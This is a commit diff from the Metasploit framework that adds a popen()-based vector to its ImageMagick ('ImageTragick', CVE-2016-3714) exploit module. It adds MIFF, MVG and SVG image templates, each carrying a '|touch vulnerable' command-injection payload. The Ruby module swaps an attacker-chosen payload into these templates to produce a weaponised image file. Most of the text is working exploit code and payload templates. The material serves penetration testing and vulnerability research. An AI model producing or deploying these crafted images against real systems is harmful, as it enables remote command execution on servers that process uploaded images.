Land #6922, add popen() additional vector to ImageMagick exploit (imagemagick_delegate)

bug/bundler_fix
Brent Cook 2016-06-03 08:06:07 -05:00
commit 5420848c49
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
7 changed files with 42 additions and 4 deletions

View File

Before

Width:  |  Height:  |  Size: 593 B

After

Width:  |  Height:  |  Size: 593 B

View File

@ -0,0 +1,14 @@
id=ImageMagick version=1.0
class=DirectClass colors=0 matte=False
columns=1 rows=1 depth=16
colorspace=sRGB
page=1x1+0+0
rendering-intent=Perceptual
gamma=0.454545
red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06
white-point=0.3127,0.329
date:create=2016-05-04T00:19:42-05:00
date:modify=2016-05-04T00:19:42-05:00
label={";touch vulnerable"}
:ÿÿÿÿÿÿ

View File

@ -0,0 +1,8 @@
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|touch vulnerable'
pop graphic-context
pop graphic-context

View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
xlink:href="&#x7c;touch vulnerable" />
</svg>

After

Width:  |  Height:  |  Size: 480 B

View File

@ -23,6 +23,9 @@ class MetasploitModule < Msf::Exploit
Tested on Linux, BSD, and OS X. You'll want to choose your payload
carefully due to portability concerns. Use cmd/unix/generic if need be.
If ImageMagick supports popen(), a |-prefixed command will be used for
the exploit. No delegates are involved in this exploitation.
},
'Author' => [
'stewie', # Vulnerability discovery
@ -35,7 +38,8 @@ class MetasploitModule < Msf::Exploit
%w{URL https://imagetragick.com/},
%w{URL http://seclists.org/oss-sec/2016/q2/205},
%w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},
%w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}
],
'DisclosureDate' => 'May 3 2016',
'License' => MSF_LICENSE,
@ -64,7 +68,8 @@ class MetasploitModule < Msf::Exploit
))
register_options([
OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
OptString.new('FILENAME', [true, 'Output file', 'msf.png']),
OptBool.new('HAVE_POPEN', [false, 'popen() support', true])
])
end
@ -75,12 +80,18 @@ class MetasploitModule < Msf::Exploit
p = payload.encoded
end
if datastore['HAVE_POPEN']
file_create(template.sub('touch vulnerable', p))
else
file_create(template.sub('echo vulnerable', p))
end
end
def template
File.read(File.join(
Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
Msf::Config.data_directory, 'exploits', 'imagemagick',
datastore['HAVE_POPEN'] ? 'popen' : 'delegate',
target[:template]
))
end